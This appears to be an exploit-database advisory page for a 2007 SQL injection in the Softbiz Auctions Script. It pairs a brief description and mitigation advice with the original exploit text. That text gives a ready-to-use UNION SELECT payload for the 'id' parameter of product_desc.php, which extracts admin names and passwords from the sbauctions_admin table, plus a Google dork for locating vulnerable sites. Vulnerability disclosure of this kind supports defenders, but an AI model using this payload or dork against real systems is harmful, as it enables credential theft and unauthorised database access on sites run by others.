Softbiz Auctions Script Sql Injection

vendor:

Auctions Script

by:

IRCRASH

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Auctions Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Softbiz Auctions Script Sql Injection

The Softbiz Auctions Script is vulnerable to SQL Injection. An attacker can inject malicious SQL code in the 'id' parameter of the product_desc.php file, allowing them to extract sensitive information from the database. The specific SQL code provided in the exploit description can be used to retrieve the admin_name and pwd (password) fields from the sbauctions_admin table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Regularly updating the Softbiz Auctions Script to the latest version may also help in resolving this issue.

Source

Exploit-DB raw data:

#####################################################################################
####                    Softbiz Auctions Script Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#Google Dork : "Starting bid" "Powered by SoftbizScripts"                           #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://sitename/product_desc.php?id=<SQL C0de>                  #
#                                                                                   #
#SQL C0de : 999999%20union/**/select/**/0,1,admin_name,3,4,5,6,7,8,9,10,pwd,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/sbauctions_admin/*
#                                                                                   #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-11-11]